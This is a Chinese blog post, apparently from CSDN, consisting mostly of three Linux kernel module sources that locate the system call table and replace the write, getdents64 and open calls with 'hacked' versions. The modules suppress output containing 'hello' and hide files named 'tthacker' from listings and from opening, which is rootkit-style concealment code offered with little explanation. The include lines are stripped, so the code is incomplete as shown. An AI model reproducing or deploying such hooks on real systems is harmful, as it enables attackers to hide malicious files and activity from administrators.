linux内核中的hook,Linux内核Hook系统调用

最新推荐文章于 2022-10-26 16:08:25 发布
最新推荐文章于 2022-10-26 16:08:25 发布
阅读量471 收藏 1
点赞数
文章标签: linux内核中的hook

1,截获write系统调用:

#ifndef MODULE

#define MODULE

#endif

#ifndef __KERNEL__

#define __KERNEL__

#endif

#include

#include

#include

#include

#include

#include

/*

#include

#include

#include

#include

#include

#include

#include

#include

*/

MODULE_LICENSE("GPL");

struct descriptor_idt

{

unsigned short offset_low;

unsigned short ignore1;

unsigned short ignore2;

unsigned short offset_high;

};

static struct {

unsigned short limit;

unsigned long base;

}__attribute__ ((packed)) idt48;

static unsigned int SYS_CALL_TABLE_ADDR;

void **sys_call_table;

int base_system_call;

int (*orig_write)(unsigned int fd,char *buf,unsigned int count);

unsigned char opcode_call[3]={0xff,0x14,0x85};

int match(unsigned char *source)

{

int i;

for(i=0;i<3;i++){

if(source[i] != opcode_call[i])

return 0;

}

return 1;

}

int get_sys_call_table(void)

{

int i,j;

unsigned char *ins=(unsigned char *)base_system_call;

unsigned int sct;

for(i=0;i<100;i++){

if(ins[i]==opcode_call[0]){

if(match(ins+i)){

sct=*((unsigned int *)(ins+3+i));

printk(KERN_ALERT "sys_call_tabl's address is

0x%X\n",sct);

return sct;

}

}

}

printk(KERN_ALERT "can't find the address of sys_call_table\n");

return -1;

}

int hacked_write(unsigned int fd,char *buf,unsigned int count)

{

char *hide="hello";

if(strstr(buf,hide)!=NULL){

printk(KERN_ALERT "find name.\n");

return count;

}

else{

return orig_write(fd,buf,count);

}

}

int init_module(void)

{

__asm__ volatile ("sidt %0": "=m" (idt48));

struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);

base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);

printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);

SYS_CALL_TABLE_ADDR=get_sys_call_table();

sys_call_table=(void **)SYS_CALL_TABLE_ADDR;

orig_write=sys_call_table[__NR_write];

sys_call_table[__NR_write]=hacked_write;

return 0;

}

void cleanup_module()

{

sys_call_table[__NR_write]=orig_write;

}

2,截获getdents64

#ifndef MODULE

#define MODULE

#endif

#ifndef __KERNEL__

#define __KERNEL__

#endif

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include "uaccess.h"

MODULE_LICENSE("GPL");

struct linux_dirent64 {

u64 d_ino;

s64 d_off;

unsigned short d_reclen;

unsigned char d_type;

char d_name[0];

};

//static inline _syscall3(int, getdents64, uint, fd, void *, dirp, uint, count);

asmlinkage long (*orig_getdents64)(unsigned int, void *, unsigned int);

struct descriptor_idt

{

unsigned short offset_low;

unsigned short ignore1;

unsigned short ignore2;

unsigned short offset_high;

};

static struct {

unsigned short limit;

unsigned long base;

}__attribute__ ((packed)) idt48;

char *hide="tthacker";

static unsigned int SYS_CALL_TABLE_ADDR;

void **sys_call_table;

int base_system_call;

unsigned char opcode_call[3]={0xff,0x14,0x85};

int match(unsigned char *source)

{

int i;

for(i=0;i<3;i++){

if(source[i] != opcode_call[i])

return 0;

}

return 1;

}

asmlinkage long hacked_getdents64(unsigned int fd, void *dirp, unsigned int count)

{

int ret;

int proc = 0;

struct inode *dinode;

char *ptr = (char *)dirp;

struct linux_dirent64 *curr;

struct linux_dirent64 *prev = NULL;

ret = (*orig_getdents64)(fd, dirp, count);

if(ret <= 0) return ret;

dinode = current->files->fd[fd]->f_dentry->d_inode;

/*

if(dinode->i_ino == PROC_ROOT_INO && MAJOR(dinode->i_dev) == proc_major_dev &&

MINOR(dinode->i_dev) == proc_minor_dev)

proc++;

*/

while(ptr < (char *)dirp + ret)

{

curr = (struct linux_dirent64 *)ptr;

if(strstr(curr->d_name,hide)!=NULL )

{

if(curr == dirp)

{

ret -= curr->d_reclen;

memmove(ptr + curr->d_reclen, ptr, ret);

continue;

}

else

prev->d_reclen += curr->d_reclen;

}

else

prev = curr;

ptr += curr->d_reclen;

}

return ret;

}

int get_sys_call_table(void)

{

int i,j;

unsigned char *ins=(unsigned char *)base_system_call;

unsigned int sct;

for(i=0;i<100;i++){

if(ins[i]==opcode_call[0]){

if(match(ins+i)){

sct=*((unsigned int *)(ins+3+i));

printk(KERN_ALERT "sys_call_tabl's address is

0x%X\n",sct);

return sct;

}

}

}

printk(KERN_ALERT "can't find the address of sys_call_table\n");

return -1;

}

int init_module(void)

{

__asm__ volatile ("sidt %0": "=m" (idt48));

struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);

base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);

printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);

SYS_CALL_TABLE_ADDR=get_sys_call_table();

sys_call_table=(void **)SYS_CALL_TABLE_ADDR;

orig_getdents64=sys_call_table[__NR_getdents64];

sys_call_table[__NR_getdents64]=hacked_getdents64;

return 0;

}

void cleanup_module()

{

sys_call_table[__NR_getdents64]=orig_getdents64;

}

3,截获open

#ifndef MODULE

#define MODULE

#endif

#ifndef __KERNEL__

#define __KERNEL__

#endif

#include

#include

#include

#include

#include

#include

/*

#include

#include

#include

#include

#include

#include

#include

#include

*/

MODULE_LICENSE("GPL");

struct descriptor_idt

{

unsigned short offset_low;

unsigned short ignore1;

unsigned short ignore2;

unsigned short offset_high;

};

static struct {

unsigned short limit;

unsigned long base;

}__attribute__ ((packed)) idt48;

static unsigned int SYS_CALL_TABLE_ADDR;

void **sys_call_table;

int base_system_call;

int (*orig_open)(const char *pathname,int flag,mode_t mode);

unsigned char opcode_call[3]={0xff,0x14,0x85};

int match(unsigned char *source)

{

int i;

for(i=0;i<3;i++){

if(source[i] != opcode_call[i])

return 0;

}

return 1;

}

int get_sys_call_table(void)

{

int i,j;

unsigned char *ins=(unsigned char *)base_system_call;

unsigned int sct;

for(i=0;i<100;i++){

if(ins[i]==opcode_call[0]){

if(match(ins+i)){

sct=*((unsigned int *)(ins+3+i));

printk(KERN_ALERT "sys_call_tabl's address is

0x%X\n",sct);

return sct;

}

}

}

printk(KERN_ALERT "can't find the address of sys_call_table\n");

return -1;

}

int hacked_open(const char *pathname,int flag,mode_t mode)

{

// char *kernel_pathname;

char *hide="tthacker";

// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);

// memcpy_fromfs(kernel_pathname,pathname,999);

if(strstr(pathname,hide)!=NULL){

printk(KERN_ALERT "find name.\n");

return -ENOENT;

}

else{

// kfree(kernel_pathname);

return orig_open(pathname,flag,mode);

}

}

int init_module(void)

{

__asm__ volatile ("sidt %0": "=m" (idt48));

struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);

base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);

printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);

SYS_CALL_TABLE_ADDR=get_sys_call_table();

sys_call_table=(void **)SYS_CALL_TABLE_ADDR;

orig_open=sys_call_table[__NR_open];

sys_call_table[__NR_open]=hacked_open;

return 0;

}

void cleanup_module()

{

sys_call_table[__NR_open]=orig_open;

}0b1331709591d260c1c78e86d0c51c18.png

心中之光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux内核hook系统调用execve函数
12-07
功能:hook系统调用execve函数,在系统调用dpkg命令时返回。 这样系统无法安装软件,以及删除软件。 1.下载后 解压直接 make编译 2. sudo insmod hook.ko 进行安装 3. sudo dmesg --follow 查看内核调试信息 4....
Linux hook系统调用open/read/write
qq_42931917的博客
09-30 1万+
测试系统: curtis@curtis-virtual-machine:~/Desktop$ uname -a Linux curtis-virtual-machine 4.2.0-42-generic #49~14.04.1-Ubuntu SMP Wed Jun 29 20:22:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux Hook 系统调用我们先要知道sys_call_table地址,这个可以看之前文章,同时我们要了解sys_open的函数原型: asmlin
Linux Kernel 学习笔记10:hook函数
热门推荐
stone8761的专栏
06-01 1万+
(本章基于:Linux-4.4.0-37) linux 内核有一套hook函数机制,可在不同hook点位置监控网络数据包,并执行丢弃、修改等操作。网络防火墙就是通过此机制实现的。 注册注销hook函数: linux/netfilter.h 注册钩子函数: int nf_register_hook(struct nf_hook_ops *reg); 注销: void
linux内核hook模块
faxiang1230的专栏
12-03 3620
linux内核支持动态加载module,今天不聊正常的module,只简单看一下实现Hook的module. hook通常翻译做劫持,不过这个翻译听起来让人不舒服,感觉有点恐怖,所以大家都是喊行话:hook. 上图是经典的堆栈式hook,也是splice典型的做法,在原有的流程插入hook,更加典型的做法是栈在调用过程从funcA->funcB变成了funcA->hook-&gt...
linux内核hook技术之指令覆盖与注入
快乐时光
03-02 1462
前言 说到hook,传统意义上,大家都会觉得跟注入和劫持挂钩。在linux内核,也可以通过指令覆盖和注入的方式进行hook,来完成自己的业务逻辑,实现自己的功能需求。 一部分人喜欢称这种hook技术为inline hook。 如何hook 具体hook细节在以下编写的驱动例子程序给出了,例子标注了详细的注释,大家可对照着代码查看。 例子程序在centos 6系统上编译并测试通过了,如果换成其他系统,部分代码可能需要进行微调,想要尝试的朋友,自己写个简单的mak...
linux 进程 inline hook,高级Linux Kernel Inline Hook技术分析与实现 -电脑资料
weixin_42279320的博客
05-11 167
==Ph4nt0m Security Team==Issue 0x03, Phile #0x03 of 0x07|=---------------------------------------------------------------------------=||=--------------=[ 高级Linux Kernel Inline Hook技术分析与实现 ]=----------...
驱动级Hook拦截系统内核调用
11-19
驱动级Hook拦截系统内核调用,源码 驱动级Hook拦截系统内核调用,源码
使用内核三步实现InlineHook的详细分析
07-06
Inlinehook原理:解析函数开头的几条指令,把他们Copy到数组保存起来,然后用一个调用我们的函数的几条指令来替换,如果要执行原函数,则在我们函数处理完毕,再执行我们保存起来的开头几条指令,然后调回我们取...
netfilter hook 注册,调用示例
08-17
Linux4.x内核编程实战——netfilter hook 注册,调用示例.nf_hook_ops,nf_register_net_hook, nf_unregister_net_hook 使用
uhook:uhook Linux 内核驱动
06-08
钩子uhook Linux kernel driver : 从用户空间调用内核函数1)。 什么是 uhook uhook(userspace kernel hook) 表示从用户空间调用内核函数。 也就是说,我们可以在内核空间写一个函数,在内核Image运行时在用户空间...
linux系统下的各种hook方式\Linux内核hook系统调用
西京刀客
08-26 1万+
文章目录一、linux系统下的各种hook方式1. 函数指针hook2. 动态库劫持3. Linux系统调用劫持 hook4. 堆栈式文件系统5. LSM二、Linux内核hook系统调用 一、linux系统下的各种hook方式 在计算机,基本所有的软件程序都可以通过hook方式进行行为拦截,hook方式就是改变原始的执行流, Linux平台上常见的拦截: 修改函数指针。 用户态动态库拦截。 内核系统调用拦截。 堆栈式文件系统拦截。 LSM(Linux Security Modules) 1. 函数
万字解析Hungtask原理及分析(上)
youzhangjing_的博客
10-26 454
Linux系统在运行过程,可能发生各种各样的卡死情况。有的表现为某个或某些CPU无法调度其他进程或无法响应断,如正在CPU上运行的进程禁止了抢占或禁止了本地断后,但其需要的资源一直无法获得(如发生了死锁等情况),而一直占据着CPU;
linux hook 任意内核函数,【求助】Kernel 4.8下编译编写的Netfilter Hook函数失败
weixin_42449311的博客
05-02 117
该楼层疑似违规已被系统折叠隐藏此楼查看此楼#include #include #include #include #include MODULE_LICENSE("Dual BSD/GPL");MODULE_AUTHOR("CG");MODULE_DESCRIPTION("FW based on Netfilter Frame");MODULE_VERSION("1.0");#define pr...
linux hook
cncnlg的专栏
05-21 4092
目录 1. 系统调用Hook简介 2. Ring3Hook技术 3. Ring0Hook技术 4. 后记 1. 系统调用Hook简介 系统调用属于一种软断机制(内断陷阱),它有操作系统提供的功能入口(sys_call)以及CPU提供的硬件支持(int 3 trap)共同完成。 我们必须要明白,Hook技术是一个相对较宽的话题,因为操作系统从ring3
Linux x86架构内核Hook实现
qq_42931917的博客
12-27 5128
Linux x86架构内核Hook实现 一、内核函数 text_poke()函数用于在内核动态替换opcode,从而达到Inline Hook的效果。 /** * text_poke - Update instructions on a live kernel * @addr: address to modify * @opcode: source of the copy * @len: length to copy * * Only atomic text poke/set should be
linux 进程 inline hook,高级Linux Kernel Inline Hook技术分析与实现
weixin_34094525的博客
05-11 186
五、实例下面是hook sys_read的部分代码实现,读者可以根据思路来补充完整。config.h#ifndef CONFIG_H#define CONFIG_H#define SNIFF_LOG "/tmp/.sniff_log"#define KALL_SYMS_NAME "/proc/kallsyms"#define HIDE_FILE "test"#define MAGIC_PID 12...
linux应用hook实例(含源码分析)
啊渊的专栏
08-12 2442
函数地址替换是最简单的hook方式,在开发的时候发现C开发的程序和C++开发的程序hook还是有差别的。C开发的程序函数几乎是可以直接使用readelf查看,因此在查找函数偏移量的时候相对简单一些,但是如果是C++开发无法直接使用readelf命令查看函数地址,因此需要动态跟踪函数地址,找到函数偏移量然后针对该函数地址进行hook。..............................
Linux hook函数简单实践
marvel的专栏
09-27 1516
#起因 最近对hook函数比较感兴趣,希望能捕获所有某种系统调用,看网上有一篇文章(http://opensourceforu.com/2011/08/lets-hook-a-library-function/) 介绍hook malloc函数,但可能内核实现不同,4.4.0上有问题。特写一篇文章进行更新。 原文hook函数调用printf,其实printf、fprintf等函数都会...
Linux ARM64平台上Hook系统调用(以openat为例)
weixin_42915431的博客
03-29 5037
我之前已经有几篇关于linuxhook系统调用的文章1,2,3,都是基于x86_64平台的,本文将会先介绍下如何在arm64平台下hook系统调用,最后会手撸的简单的例子。 本文实验环境是在银河麒麟服务器V10系统上: [root@localhost ~]# cat /etc/os-release NAME="Kylin Linux Advanced Server" VERSION="V10 (Tercel)" ID="kylin" VERSION_ID="V10" PRETTY_NAME=.
linux内核hook
最新发布
06-06
Linux内核hook是指,在Linux内核预留一些接口或函数,允许用户通过编写相应的钩子函数,实现对内核行为的监控、拦截、过滤、修改等操作。这样可以扩展内核功能、定制化内核行为,同时也方便了用户对内核的研究和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值